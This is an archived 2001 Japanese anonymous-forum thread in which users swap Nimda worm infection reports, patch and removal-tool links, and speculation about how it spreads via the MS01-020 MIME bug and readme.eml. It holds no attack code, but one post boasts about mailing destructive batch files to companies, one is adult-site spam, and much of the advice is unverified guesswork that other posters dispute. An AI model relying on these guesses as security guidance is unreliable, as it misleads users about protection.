420 :名無しさん@お腹いっぱい。:01/09/21 20:33
>>339
小印真 → 牙
知津  → 舌
栗    → 鼻
大印真 → 頬

421 :名無しさん@お腹いっぱい。:01/09/21 20:38
SP2DLして当てるの面倒なんだけど、以前のJavaVMビルド3802じゃダメなのかな?
あ〜あ、毎回パッチパッチで継ぎ接ぎパッチワーク細工じゃん。

422 : :01/09/21 21:30
>>414

プロクシにわざわざ、MSを選ぶおまえが大馬鹿

423 :名無しさん@お腹いっぱい。:01/09/21 21:52

あのー…

なんか窓の杜とかmonazilla.orgとか見ようとすると、

ガーリガーリガーリガーリガーリガーリ…

って音がしてブラウザ(Donut)が強制終了されるんですけど…

ウィルススキャン(ノートン)やデフラグ(Diskeeper)やろうとしても
ガーリガーリガーリガ(以下略
って鳴るんですけど、
あのー、これって、もしかして僕のPC逝っちゃってます…?(;´Д`)

ちなみにOSはwin2ksp2、IEは5.5sp1です…
再インストールして一ヶ月も経ってないのになぁ…

424 : :01/09/21 21:58
即刻ウィルスチェックして
感染していなかったらラッキーだな。
SP2にあぷでーと。

425 :名無しさん@お腹いっぱい。:01/09/21 22:05
>>423

> あのー、これって、もしかして僕のPC逝っちゃってます…?(;´Д`)

私の経験からすると逝ってます・・。

> ちなみにOSはwin2ksp2、IEは5.5sp1です…

ご覧の通り逝ってヨシ!な状態です・・。
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

> 再インストールして一ヶ月も経ってないのになぁ…

せっかくwin2ksp2なのに、IE5.5sp1が余計と思われ・・。

これでもやっとけ。
http://www.trendmicro.co.jp/nimda/tool.asp

426 :名無しさん@お腹いっぱい。:01/09/21 22:16
age

427 :名無しさん@お腹いっぱい。:01/09/21 22:20
ニムダで修復不能・再インストールになっちゃったヒトっています?

CodeRedのときはそういうマシンみたけど、ニムダでは一般的なウイルススキャンソフトの修復で大丈夫なような・・。

428 :名無しさん@お腹いっぱい。:01/09/21 22:24
メールに関しての全然情報が無いけどnimudaメールが送られて来た人います?

429 : :01/09/21 22:24
よくわからないのですが、
MSNのIISって脆弱性問題を回避するパッチを当てていなかったって事でしょうか?

430 :  :01/09/21 22:33
>>428
バグリ気味でなかなか動かないってどっかに有ったような。。
ネットワークスキャン、一般クライアントに感染した場合も
実行してるとすればかなりリソース食いそう。同時にメール
アドレスサーチして送信作業してるとすれば。

431 :名無しさん@お腹いっぱい。:01/09/21 22:35
前スレで下記のようなレスがあったけど、今現在のnimdaの不正アクセス
状況を誰か貼ってくれんかな? ちょっとはマシになってきたの?

912 :名無しさん@お腹いっぱい。 :01/09/20 16:01
 俺のPCのnimdaアクセスログだよ
 04時 119 |||||||||||
 05時 239 |||||||||||||||||||||||
 06時 175 |||||||||||||||||
---- 以下略 ------------------------------------

432 : :01/09/21 22:36
この数時間でだいぶ減ってきたよね

433 :名無しさん@お腹いっぱい。:01/09/21 22:42
>>429

スマソ、あんた誰?何番さん?

でないと答えようがないヨ。

434 :名無し:01/09/21 22:43
 いま応急処置に悩んでいる素人管理人です。
 IEのセキュリティカスタマイズの、
 JAVAの許可っていうのと、scripting java applet
ってあるのですが、どっちをOFFにすればよいのでしょうか。

435 :423:01/09/21 22:43
>>424
ノートンウィルススキャンは前に書いたように始めると
ガーリガーリ、って鳴って強制終了されます(;´Д`)
自分テレホなのでまだあぷでーと出来ないんです(;´Д`)
>>425
駆除ツールやってみました
なんか見つかんなかったみたいです
nimdaが原因じゃないんでしょうか(;´Д`)

…やっぱり皆さんは窓の杜やmonazilla.orgなどは普通に見れてるんでしょうか?

5.5の挙動に慣れていたもので、5.01sp2が不自然に感じてしまい、つい…
5.5sp1にしてしまいました。。

ハァ…
もうこりゃ再インストですかね…(;´Д`)

436 :名無しさん@お腹いっぱい。:01/09/21 22:44
うちは20時/21時の合計で271件Nimdaのアクセスがある

437 :あひ:01/09/21 22:48
>>435
とりあえずキャッシュ全部消して、キャッシュする(物理)ドライブ変えてみたら?
つーか、Donutなに?IEのコンポーネントブラウザ?無知でスマソ。

438 :名無しさん@お腹いっぱい。:01/09/21 22:49
>>432
初期に発見されたのがアメリカで米大陸で利用者の多い時間が攻撃も多い。
今頃は明け方から通勤の時間かだからな。

http://aris.securityfocus.com/alerts/nimda/010919-Analysis-Nimda.pdf
ここでもUSの感染がダントツ。

439 :名無しさん@お腹いっぱい。:01/09/21 22:49
>>432
少しは鎮静化の方向に向かってるみたいね。
>>436
まだまだ安心は出来んが。

ってところかな。

440 :437:01/09/21 22:49
あとスキャンディスクしてみたら?

441 :名無しさん@お腹いっぱい。:01/09/21 22:52
>>435
そりゃ〜きっと、ガリガリ君がいるんだよ。
HDDの中でアイスかっじてんだな、きっと。

442 :コピペでし:01/09/21 22:53
米民間調査会社のまとめによると、
世界のサーバーやパソコンに急速に感染した新種ウイルス
「Nimda(ニムダ)」による被害額は、
約6億ドル(約700億円)に達したもようだ。
感染拡大のペースは徐々に低下しつつあるが、
今後変異種が登場する可能性もあり、
連邦捜査局(FBI)は引き続き注意を呼び掛けている。

http://it.nikkei.co.jp/it/

443 : :01/09/21 23:02
>>435
>自分テレホなのでまだあぷでーと出来ないんです

はぁ? ふつうテレホじゃなくても接続できるはずだが。電話代がかかるだけだろ。
セキュリティよりも電話代を惜しむようなやつは氏ね。

444 :            :01/09/21 23:08
http://www.msn.co.jp/home.htm
復活してるし・・・。
知らなかったYO!

445 :名無しさん@お腹いっぱい。:01/09/21 23:08
>>442
6億円の間違いじゃ・・・・
日本国内は一体幾らなんだ。。
米のPCセキュリチー企業は大忙しね。

446 :名無しさん@お腹いっぱい。:01/09/21 23:09
>>435

漏れはWin2K SP2だったんだけど、TCP使うとブルーバックになってネット系はなにもできなくなった。

直前にポートスキャン(19日の朝7時ごろ)や、例のメディアプレーヤー開く、mep.exeなる見慣れぬexeからの接続要求(のーとんいんたらねっとせきゅりてぃー)など不審な挙動が相次ぐ。

自覚はまったくないのだが、ダウンロードを受け入れてしかも実行してしまっていたのだと思う。

しかしネット使うと落ちるのでメールも取れないし、2chも見れないので異変は分かっても何だかわからない。

とりあえず、TCPを使わない状態なら落ちなかったので、現状の(でも前夜アップデート)ノートンでスキャン。

当時のパラメータはそれがニムダとも知らなかったし、隔離しかできなかったけど、しこたま不審ファイル(mep.exeもビンゴ)を発見、隔離。

普段はケーブルTV(直IP)でつないでいるのだが、恐いので毎回IPもらいなおしのダイヤルアッププロバイダで接続してみる。

問題なくつながるので、エイヤ!でノートンアップデート、すぐ切る。

これでスキャン。さらにしこたま発見。一部は修復、駆除される。

このあともいろいろやったけど、こんな感じかなぁ・・。

参考になるかい?

447 :名無しさん@お腹いっぱい。:01/09/21 23:09
>>441

気持ちはわからんでもないが、当事者にとっちゃそんな場合じゃないって(^^;

448 :名無しさん@お腹いっぱい。:01/09/21 23:17
アタックの多い人ってIPがUS系のUUとかAOLとかのAP使ってません?
当方classBのCATVですがアタックが全く有りません。おとなしい物です。
共有攻撃は受けているのかもしれませんがまだ調べてません。
コードレッドはいるんですけどねぇ。

449 :名無しさん@お腹いっぱい。:01/09/21 23:18
>>444

初日表示が小さくて顰蹙買ったお知らせも

「[重要] Nimda ワームについてのお知らせ」

ってことで復活してるね。まだちいせーけど。
テロの上あたりに特集組んでもらいたかった。

とりあえず

http://help.msn.co.jp/notice.htm

MSがういるす撒いた記念としてミラーしとけ

対策ページへのリンクが増えた模様。

450 : :01/09/21 23:23
>>448
CATV側で80番ポート塞いでるんだよ。
ちょっと前のYahooBBみたいにね。

451 :名無しさん@お腹いっぱい。:01/09/21 23:25
>>448

これらはやってないけど、一度CodeRedII食って、大穴IPとして配信されちゃまったらしく手に負えないくらいポートスキャンがきた。
うちはケーブルでIP2つもらってたので常時接続(契約じゃなくて使用形態)ではないほう(ご開帳してなくてヨゴレてないほうという意味)ととりかえた。
いまだにそっちは重いがWin98で使用だから当然バックドアなんかないし感染もしないのでなんとかなってる。

452 :名無しさん@お腹いっぱい。:01/09/21 23:26
>>450
コードレッドが来ているのでそれは違います。

453 :名無しさん@お腹いっぱい。:01/09/21 23:28
うちの大学・・・・・

454 :451:01/09/21 23:28
>>452

御意。以外とケーブルTV屋って何もしてくれないんだなと思った。

455 :名無しさん@お腹いっぱい。:01/09/21 23:29
>>453

が、どうしたのさ?!

456 :名無しさん@お腹いっぱい。:01/09/21 23:33
>>455
ニムダ被害報告スレ と間違えたようよ。
該当スレの7参照。

457 :名無しさん@お腹いっぱい。:01/09/21 23:35
>>456
まさしく!スレ違いスマソ。

458 :名無しさん@お腹いっぱい。 :01/09/21 23:34
>>428

亀レスで悪いけどうちにきたよ。
そのときノートンは定義ファイル出来てなかったんで
反応しなかったけどReadme.exeってあからさまに
ぁ ゃι ぃファイルだったんで即ごみ箱に捨てた。

459 :名無しさん@お腹いっぱい。:01/09/21 23:37
シマンテックの駆除ツール、できっ!
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000340.htm

>>こちら
>> http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a%40mm.removal.tool.html
>> 駆除ツール(437KB)
>> http://securityresponse.symantec.com/avcenter/Fixnimd.com
(中略)
>>やっぱり実行ファイル(拡張子.exe)に感染するようですねぇ…
>> しかも感染方法が非常に巧妙です。

だれかこの仕組みをわかりやすく書いてくれ。。。わからぬ。。。

460 :名無しさん@お腹いっぱい。:01/09/21 23:38
あのさあ。

フォルダの設定でWeb表示ってのあるでしょ。

.JPGだと選択するだけで左側に寒ネイルが表示されるような。

このときに感染サイトの.lnkファイル(お気に入りのことだ)があって、これ選択しちゃったらどうなるんでしょ?

461 :>>460:01/09/21 23:40
>>460

つーか、自分でやるべきだよなφ(.. )

462 :名無しさん@お腹いっぱい。:01/09/21 23:42
Win2kで感染した奴ってCodeRedの時いったい何してたの?
いや、マジで。

463 :名無しさん@お腹いっぱい。:01/09/21 23:45
>>460 の答え。

ガ━━(゚Д゚;)━━ン

いきなしダイアログひらきました。

感染可能ブラウザの場合、選択(開くではない)だけで感染すると思われます。

これ、感染前の.lnkでもリアルタイム更新してると思われ。

ヤラレターヨ(´Д`)

464 :名無しさん@お腹いっぱい。:01/09/21 23:51
>>461
うちの会社でも WEB表示にしててネットワーク経由で入れられた *.emlファイルを
確認するため右クリックして選択しただけで感染した例がある。
(IEが未対応だったので)

465 :名無しさん@お腹いっぱい。:01/09/21 23:52
>>462

恥を忍んで申し上げますが、

再インストールしてSP2当ててましたよ。

SP2当ててたって、ダウンロードダイアログ開いたときにOK・実行しちまえば感染する。

漏れの場合、ノートでタッチパッドにふれただけでタップされちまったんだと思う。
ダウンロードしたかどうか(プログレス窓)は瞬間で見落としたと思う。
真相はわからないけど、W2KSP2は自動感染しないというなら、それしか思い当たらない。

言い逃れしたい訳じゃないが、ニムダが知られてないとき、Web見て適切な対処できたヒト、います?

恥を忍んで申し上げました。

466 :名無しさん@お腹いっぱい。:01/09/21 23:53
>>462
ブラウザまでは対処してなかったでしょうね。

管理職とかで感染した人とか多いかも。

467 :ナナシサソ:01/09/21 23:53
>>465
NetscapeNavigatorだったから助かった

468 :名無しさん@お腹いっぱい。:01/09/21 23:54
>>465
なるほど、不運な偶然が重なるとそうゆうこともあるんですね。
肝に銘じておきます。

469 :名無しさん@お腹いっぱい。:01/09/21 23:54
俺は、ウイルスに感染しない常識的な知識を、ある程度持っているつ
もりだ。
しかし、自慢するわけではないが
 Happy99
 Homepage.A
 CodeRed
 SIRCAM
 Nimda
に感染した。
感染した最大の原因は俺の好奇心。これらのウイルスの恐ろしい点は
俺の好奇心をチクチクつついてくるのだ。
俺に効くワクチン誰か開発してくれ。

470 :名無しさん@お腹いっぱい。:01/09/21 23:55
>>462
マシンのパワーがあってブロードバンド使っていると
意外と本人は感染に気が付かないみたいだよ。
「なんか最近重い時があるなー」ぐらいで。

471 :名無しさん@お腹いっぱい。:01/09/21 23:57
疑問なのですが、
Admin.dllで発病した場合でも、メール送信はするのでしょうか?
Readme.exeで感染した場合でも、tftpサーバたてて 別の IISを攻撃するのでしょうか?

472 :名無しさん@お腹いっぱい。 :01/09/21 23:57
>>469
俗に言う「馬鹿につける薬」を開発しろってことですか(藁

473 :名無しさん@お腹いっぱい。:01/09/21 23:58
>>465

IEを使う自らの馬鹿さ加減を恨め。

474 :名無しさん@お腹いっぱい。:01/09/22 00:00
>>462

誤解があるみたいだけど、対策済みのあなたのWinで、IE一切使わなくても数回のシングルクリックで感染可能なのよ?

475 :名無しさん@お腹いっぱい。:01/09/22 00:03
>>462
放置だよ。だって自分の所は改竄されないし被害がないもん。
でも、Nimdaで一気にヤバくなって終了〜。

Nimdaの直後からCodeRedが減ってきたのもうなずける。

476 :名無しさん@お腹いっぱい。:01/09/22 00:03
>>473

よく読め。IE関係ない。

外見急行をアンインストールしてない自らの馬鹿さ加減を〜 というならわからなくもないが。

477 :名無しさん@お腹いっぱい。:01/09/22 00:07
>>476

タッチして簡単に実行できた(してしまった)のは、
IEだったからじゃないの?

478 :名無しさん@お腹いっぱい。:01/09/22 00:09
>>477
emlはIEのコンポーネントあたりに関連づけされてるから、ネスケだろうが、
IEが完全にアンインストールされていなければ、開いちゃうんではなかろうか。

479 :名無しさん@お腹いっぱい。:01/09/22 00:12
僕は2K(IE有り)でNetscapeだけど、開かないよ。
(別窓は開くけど。。)

480 :名無しさん@お腹いっぱい。:01/09/22 00:13
>>473

つーかさ。当時MSN感染してたわけじゃない?

IEとして使って無くても ファイルブラウザの アドレス: とこにさ、

たまたまここにフォーカスしてるときになんかキーさわってEnter押してたらダイアログ開くわけよ。

もっかいEnter押してたら感染するわけよ。

おれはねすけだもんね、ってやつはIEにセキュリティーホールあったって使ってないもんね、でパッチしない訳よ。

481 :名無しさん@お腹いっぱい。:01/09/22 00:17
>>480
外国の方ですか?
文章力に難があるようですが・・

482 :名無しさん@お腹いっぱい。:01/09/22 00:18
確かに、反論しようにも、意味がよく分からん。

483 :名無しさん@お腹いっぱい。:01/09/22 00:18
つまり、エクスプローラも使用しなければいいんだね?

484 :名無しさん@お腹いっぱい。:01/09/22 00:22
>>481,482
一行飛ばしで書いてるだろ。
たぶん行間を読めってことじゃないかな。

485 :名無しさん@お腹いっぱい。:01/09/22 00:22
>>481,482
理解力に難有。
IEが、エクスプローラや何かから、勝手に動くことがあるという
意味だと思うけど。

486 :名無しさん@お腹いっぱい。:01/09/22 00:25
>>485
お前よく分かったな。すばらしい理解力です。

487 : :01/09/22 00:27
あのさ・・・NIMDAがクライアントサイド、ホムペから感染させるのに使う
不正なMIMEヘッダのバグMS01-020って3月頃なんだよね。発見されてるの。
パッチも同時期配布済み。
但し、厨房御用達のサンプルコードも同時期配布。ある意味誰でも真似でき
た。こんなに騒がれるなら、俺も真似しとけば良かったよ(w
感染広げさせるスキルは無いけど、自爆.bat色んな会社に送りつけるのは可
能。
・・・と敢えて煽っておく。決して最新のバグじゃないから。
当時、慌ててパッチ当てて、ネット初級でも少しカキコしたけど。
コンセプトウイルスって、ソースに署名付いてるのも意味ありかな。。

488 :名無しさん@お腹いっぱい。:01/09/22 00:28
>>483
〜しなければいいんだね?〜しとけばいいんだね?って論調が多いけど、今回のニムダって本当にそれだけで済むの?
××しとけばオッケー
○○しなきゃオッケー
という訳には行かないんじゃないの?

489 :W32NIMDA:01/09/22 00:29
反対から読むと Admin to 3 W(ar) 3次大戦を支配する・・・

490 :名無しさん@お腹いっぱい。:01/09/22 00:31
>>489

どれへの亀レスだい?(^^;

491 :名無しさん@お腹いっぱい。:01/09/22 00:32
>>489
ネタカイ?

492 :名無しさん@お腹いっぱい。:01/09/22 00:33
>>489
"W32"の部分は、駆除ソフトのメーカーが分類用に付ける識別子ですが何か?

493 :名無しさん@お腹いっぱい。:01/09/22 00:34
>>489
そういうトンデモはもうお腹いっぱい。

494 :名無しさん@お腹いっぱい。:01/09/22 00:34
俺の会社、IE6.0なのに見事感染・・・何故??
メールソフトも使ってなかったし、何のメッセージも出なかったのに。

495 :名無しさん@お腹いっぱい。:01/09/22 00:35
少し489が可愛そうになってきた。
スマンかった。

496 :名無しさん@お腹いっぱい。:01/09/22 00:36
>>494
感染&発病なのか?それとも感染ファイルが
ウィルス検索に引っかかっただけか?

そこをはっきり言わないと情報が混乱するよ。

497 :名無しさん@お腹いっぱい。:01/09/22 00:36
   これで大丈夫?
(1)Netscape(や、その他)ユーザは、エクスプローラを使用せず
   Salamander等、別のファイルブラウザを使う。
(2)IEは、exeファイルを破壊し、絶対に起動できないようにする

498 :名無しさん@お腹いっぱい。:01/09/22 00:37
>>489
マジレスすると、3 Wで、3次大戦は無理があるな。日本人的発想だ。
せめて3rd W(ar)だろう。しかもtheがいるだろう。
ならば、まだ 3 W をWWWと解釈するほうが自然ではなかろうか(w

499 :名無しさん@お腹いっぱい。:01/09/22 00:38
>>497
COMコンポーネントやそれへの関連づけも消えてないと意味無いかと思われ。
IEのexeなんて本体じゃないし。

500 :名無しさん@お腹いっぱい。:01/09/22 00:38
>>497
だめだろ。

501 :494:01/09/22 00:40
>>496
感染しただけです。
ウィルスバスターにひっかかって、そのまま除去。
再度ウィルスバスターかけたら問題なかった。

502 :名無しさん@お腹いっぱい。:01/09/22 00:44
このニムダはWebメールで見ても感染するのかな?
HTMLメールで感染する事を考えればIEのサービスパック当てとけば
大丈夫なような気もするけど?

どうなのかな?

503 :名無しさん@お腹いっぱい。:01/09/22 00:45
>>499,500
じゃあ、
OutLookExpressアンインストールする。他はそのまま。
ってのはどうかな? もちろんNimdaだけに関してね。

504 :名無しさん@お腹いっぱい。:01/09/22 00:50
>>502
ヘッダの異常で添付ファイル実行してしまうのはOEの方だからセーフ?
>>503
これもセーフ?

自信ない、誰かフォローよろしく。

505 :名無しさん@お腹いっぱい。:01/09/22 00:53
>>494

みてね。

貴重な人柱さんの体験
>>293
>>389
>>400
>>402
>>403

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品


MicrosoftR Internet Explorer 6 (最小構成時のみ)

#なお、本当に最小構成時のみなのかは疑惑視されています。

506 :名無しさん@お腹いっぱい。:01/09/22 00:55

http://www.mainichi.co.jp/digital/netfile/archive/200109/21-1.html
被害は少なかったみたいだ。ニムダショボすぎ。

507 :名無しさん@お腹いっぱい。:01/09/22 00:58
>>504
>>>502
> ヘッダの異常で添付ファイル実行してしまうのはOEの方だからセーフ?

http://memo.st.ryukoku.ac.jp/archive/200109.month/1286.html
これを試す限り「実行してしまうのはOE」とは言い切れないような・・。

どうもWebメールサイトの作りによってアウトのような・・。

508 :名無しさん@お腹いっぱい。:01/09/22 01:00
>>506,507
大丈夫なサイトのようね。最近疑い深くなっちゃってね。
リンククリックするのが怖くてたまらん。

509 :494:01/09/22 01:01
>>505
ありがとうございます。
IE6.0を過信していた不明を恥じます(鬱

510 :名無しさん@お腹いっぱい。:01/09/22 01:05
やっぱりIEとOEは最悪。

511 :名無しさん@お腹いっぱい。:01/09/22 01:05
>>507
いくらなんでもブラウザが何の確認もなく直接exeを開くとは考えにくかったんだけど。
ありえるの?
Web見ただけで感染するのはあくまでreadme.emlをヘルパーで開きに行くからだ、
と思っていたんだが。

512 :(´∀` ):01/09/22 01:06
>>504
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
↑別にOEとは出てないよん。MS01-020
「HTML形式のメール」という点に注目。
OEに絡むだけならブラウザは関係無いはず。
・・ブラウザに多機能盛り込んだマイ糞が甘かった訳だ。

513 : :01/09/22 01:06
あのーメディアプレイヤーは関係有ります?

514 :名無しさん@お腹いっぱい。:01/09/22 01:09
>>512
ホントだね。俺の勘違い。ということは502は黒。

515 :名無しさん@お腹いっぱい。:01/09/22 01:09
>>511
emlの中身を変なのにしてあると、中の指定ファイルを直接開くものが出来てしまうらしい。
ニムーダ

516 :(´∀` ):01/09/22 01:10
>>513
有る。
MIMEタイプのWAVE関連付け。
バグの発見者はコレ入って無いとダメみたいって言ってたような。。
何でそうなるかそれ以上はあんまり言いたくない。
全然外出だけど・・

517 : :01/09/22 01:12
>>516
ありがとう

518 :名無しさん@お腹いっぱい。:01/09/22 01:12
>>507
幸いニムダには搭載されませんでしたがアクテッブXの脆弱性を突いた物があります。
プライスロトのトップページがこれで改竄されました。
ページを見るだけで起動不可。画面には ふぁっくじゃぱにぃず

519 :名無しさん@お腹いっぱい。:01/09/22 01:18
>>518

該当するアクテッブX(ママ)が入っている場合、これ(プライスロトのトップページがこれで改竄)をネスケで開いたらどうなりますか?

一発アウト(ページを見るだけで起動不可)はなくても、操作ミスで連携プレーでアウトとかありえますか?

520 :名無しさん@お腹いっぱい。:01/09/22 01:19
ウイルスから身を守る基本は”訳分からない添付ファイル”は開かない。
それをいきなりやっちゃうブラウザとメーラ > 逝ってよし!
もう100万人ぐらい言ってると思うが。

521 :名無しさん@お腹いっぱい。:01/09/22 01:22
>>520
アウトルックは使うなでいいんじゃねえの

522 :名無しさん@お腹いっぱい。:01/09/22 01:23
>>519
ネスケでは悪恥部Xは無効。
(不人気の理由でもあるが)

523 :名無しさん@お腹いっぱい。:01/09/22 01:23
>>520

.scrとか、実質.exeなのに.exeじゃないような顔してるファイルがあるよな。このへんそのうち突かれそうな肝・・。

524 :518:01/09/22 01:23
>>519
今そのソースをネスケで開いていますが何も起こりません。

525 :名無しさん@お腹いっぱい。:01/09/22 01:24
俺PC歴15年でこれほどウイルス感染で被害を受けたのは初めてだ。
一応割れとかもやってるけど
すべてのマシンにウイルスソフトは入れてるし今まで少しでも危険な作業はLANにつながないマシンでやってた。
パッチもこまめに当ててた。だから自分は絶対大丈夫だと
ウイルス騒ぎが起こるたびに冷笑していた。
しかし今回は自分もやられた。
自宅にある5台のパソコンの中で外出用の一台のサブノートだけ
ハードディスク容量が厳しいんでブラウザが古かった。
ブラウザのスタートページがMSNになってたんで
外出先でモバイル通信をしていたときに感染
知らぬまま自宅のLANにつないで全部のマシンに感染
まさかMSNを見ることでウイルスに感染するとは夢にも思わなかったよ。

526 :名無しさん@お腹いっぱい。:01/09/22 01:24
>>521
ニムダのWeb感染はどうよ?使うなだけでヨシ?

527 :名無しさん@お腹いっぱい。:01/09/22 01:25
>>521
IEを忘れたらだめでしょ

528 :名無しさん@お腹いっぱい。:01/09/22 01:25
>>524

おおお、勇気ある人柱感謝(-人-)

529 :名無しさん@お腹いっぱい。:01/09/22 01:27
>>524 漏れも自分で確認したくなった・・・σ(^-^;;

530 :名無しさん@お腹いっぱい。:01/09/22 01:28
ネスケはもっとヒドイ穴が沢山あるよん。
五十歩百歩。
怖いならドリキャスがイイネ!

531 :名無しさん@お腹いっぱい。:01/09/22 01:29
>>525

MSNがキツかったよ。多分漏れもそれ。18日夜11時ごろ感染したんだけど、その時点で日本語の感染サイトは他になかったと思われ。

532 :名無しさん@お腹いっぱい。:01/09/22 01:29
502のも結局はSP2当てておけば安全なのか?

533 :名無しさん@お腹いっぱい。:01/09/22 01:30
MSNにクレーム送った人、返事有りましたか?

534 :名無しさん@お腹いっぱい。:01/09/22 01:30
ドリキャス? what?

535 :名無しさん@お腹いっぱい。:01/09/22 01:31
>>530
ネスケの4.Xっていまでもちゃんとパッチ出るの?

536 : :01/09/22 01:31
>>530
(w
海外だと、そればっかやってる厨房セキュリチー?サイト
結構有るよね。
俺見たサイト、java使ってるの多かったヨウナ。。。

537 : :01/09/22 01:32
IE5.5 SP2 セキュリティレベル2で感染した。
ガイシュツのcnet覗きにいったらやられた。
やっぱしメディアプレイヤーがreadme.*を読みに行っている模様。

538 :クレーム送ったわけじゃないけど:01/09/22 01:33
From: "MSKK ISV External Communications" <mskkisv@microsoft.com>
Subject: Nimda ワームに対するセキュリティ対策の確認に関するお願い

※弊社他部門から本内容について重複して連絡申し上げる場合がござい
 ますが、ご容赦ください


パートナー各位殿
                                     2001年9月20日
                                 マイクロソフト株式会社
                                     Windows製品部
                             ディベロッパーリレーションGr.

        Nimda ワームに対するマイクロソフト製品の
      セキュリティ対策の確認および徹底に関するお願い

拝啓 益々ご清栄のこととお慶び申し上げます。また平素は、弊社製品の拡販に
ご尽力いただき誠に有り難うございます。

さて、9月中旬より世界中で非常に感染力が強いNimdaワームおよびその変種に
よる弊社製品を稼動するマシンにおける感染ならびに攻撃に伴うネットワークトラ
フィックの著しい増大の被害が報告されています。
一連の攻撃からパートナー各位様の重要なお客様のシステムの保護を目的に、
緊急の対策を行う必要があると弊社は判断いたしました。つきましては、本メー
ルでご案内するセキュリティ対策の実施方法に基づき、お客様環境における弊
社製品のセキュリティ対策の確認および徹底をお願い申し上げます。

お客様のシステムを守り、さらなるインターネットの健全な発展のために、マイク
ロソフトは今後とも積極的に情報提供に努めて参ります。是非とも本お願いの趣
旨をご理解いただき、ご協力頂けますよう重ねてお願い申し上げます。
敬具

539 : :01/09/22 01:34
訂正;2−>中
IE5.5 SP2 セキュリティレベル中で感染した。
ガイシュツのcnet覗きにいったらやられた。
やっぱしメディアプレイヤーがreadme.*を読みに行っている模様。

540 :518:01/09/22 01:37
ネスケも素晴らしいとも言えないと思いますが実用に困る事はありません。
ネスケの場合メデューサ画像が一番怖いです。
小さなgif画像なんですが、レイアウトを固定するの為に
あちこちの商業ページで使われているので気が付いた時には落ちてます。

>>528 529
シャレにならないのでウプしません。

541 :名無しさん@お腹いっぱい。:01/09/22 01:37
>>539
感染ってのはファイルを引き込んだだけで、readme.exeを実行して発病はしてないんでしょ?
それは「ヤラレタ」わけでは無いと思われ。

542 :名無しさん@お腹いっぱい。:01/09/22 01:37
MSがコレクトコール用意するなんて史上空前?!

(か~ しヽ ιゅ⊃ ですが・・。)
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
マイクロソフト IIS セキュリティ情報センター
対象製品 : IIS 4.0、IIS 5.0
電話番号 : 0120-69-0196
営業時間 : 平日 9:30〜12:00、13:00〜19:00
土曜 10:00〜17:00
日曜・祝日 休み
9 月 23 日 (日)、9 月 24 日 (月・振替休日) については、10:00-17:00 にて窓口をオープンいたします。(上記の時間外は録音メッセージによるご案内を実施しております)

543 :名無しさん@お腹いっぱい。:01/09/22 01:38
>>539
IE5.5 SP2でも感染するのはもう分かってる。
問題は見ただけで感染したかどうか。
クリックも何もせずに見ただけで感染したの?

544 :名無しさん@お腹いっぱい。:01/09/22 01:38
>>538
IPAはたいしたことないって言ってるよ。

545 :(´∀` ):01/09/22 01:39
>>539
違う。リードミー.emlが
メディアプレーヤー呼んでるの。。
何でそうなるかは敢えて聞かないで。。。
すっごい単純。。。

546 :名無しさん@お腹いっぱい。:01/09/22 01:39
>>542
クレジットカード番号をご用意ください

547 :名無しさん@お腹いっぱい。:01/09/22 01:39
>>530
ドリキャスっつったら、x-avefrontでアクセス履歴が漏洩するじゃん。

548 :名無しさん@お腹いっぱい。:01/09/22 01:40
>>542
MSがコレクトコールでかけてくるのか?
最悪だな(w

549 :名無しさん@お腹いっぱい。:01/09/22 01:40
>>535
最新4.78

550 : :01/09/22 01:41
>>541
ああ、感染しただけで発症(実行)してないみたいです。
問題は何が実行の引きがねになるのか、ですね。

551 :名無しさん@お腹いっぱい。:01/09/22 01:43
>>544
>>>538
> IPAはたいしたことないって言ってるよ。

自分でウイルス供給しちゃったんだからMSにとっちゃ著しい被害だろ(w

552 :名無しさん@お腹いっぱい。:01/09/22 01:44
>>546

やっぱそうなん?!

553 :名無しさん@お腹いっぱい。:01/09/22 01:44
>>415
遅くなったけど、ありがとう。
とりあえず、トレンドマイクロで配布してるツールでチェック・削除を
試しています。まぁ、メディアプレーヤーがかってに開いちゃうので
もう仕方ありません・・・
発病はしてない模様ですが・・・

554 :名無しさん@お腹いっぱい。:01/09/22 01:44
>>549
それ、らすとあっぷでーといつ?

555 :名無しさん@お腹いっぱい。:01/09/22 01:49
>>544


ん?MSは

1) 9月中旬より                  <--18日は下旬だよな?
2)非常に感染力が強いNimdaワーム     <--各スキャンソフトサイトがnimudaを告知し始めたの19日・・。
3)およびその変種                <--変種なんて今もまだ知られていないぞ?
4)弊社製品を稼動するマシンにおける感染 
5) 4)=弊社で稼動するマシンにおける感染  <--MSN。

を知っていて隠していたのか?

556 : :01/09/22 01:51
<--18日は下旬だよな?
↑1〜10日が上旬、11〜20日が中旬、21〜月末が下旬。

<--各スキャンソフトサイトがnimudaを告知し始めたの19日・・。
↑nimuda→Nimda

557 :名無しさん@お腹いっぱい。:01/09/22 01:51
>>544

MSの知っている非常に感染力が強いNimdaワームおよび「その変種」ってなんだぁぁぁΣ<(゜▽゜;)>

558 :名無しさん@お腹いっぱい。:01/09/22 01:55
>>551
つーか、IPAが糞。下々が報告してくるはずと信じてやがる > 天下り特殊法人

559 : :01/09/22 01:55
>>557
IE,outlook,media player,windows

560 :名無しさん@お腹いっぱい。:01/09/22 01:56
>>559

なるほど(..=)

561 :名無しさん@お腹いっぱい。:01/09/22 01:57
>>554
最近だよ。でも、Netscapeのホームページには(直接は)ないよ。
http://home.netscape.com/download/0730101/10000-ja-win32-4.78-complete-128_qual.html

562 :名無しさん@お腹いっぱい。:01/09/22 01:58
>>559

ガ━━(゚Д゚;)━━ン

563 :名無しさん@お腹いっぱい。:01/09/22 01:58
IPAが「大した事ない」なんて何時言った?
デマ流すな。

564 :名無しさん@お腹いっぱい。:01/09/22 01:59
>>561

ねすけ6正式版より後?

565 :-:01/09/22 01:59
モロ、無修正画像サイト発見!

http://www.sex-jp.net/dh/01/
http://www.sex-jp.net/dh/02/
http://www.sex-jp.net/dh/03/
http://www.sex-jp.net/dh/04/

566 :(´∀` ):01/09/22 02:00
ニムダ仕様のバグの一つって言うのは、添付ファイルのファイルタイプに謎のWAVE指定
する事らしいよ。
この指定された情報開こうとしてちゃんと不正だって処理できないのがIEのバグでした
とさ。
処理できなくてIE君が??ってなって、お漏らしするみたいに添付部分のスクリプト実
行しちゃうの。
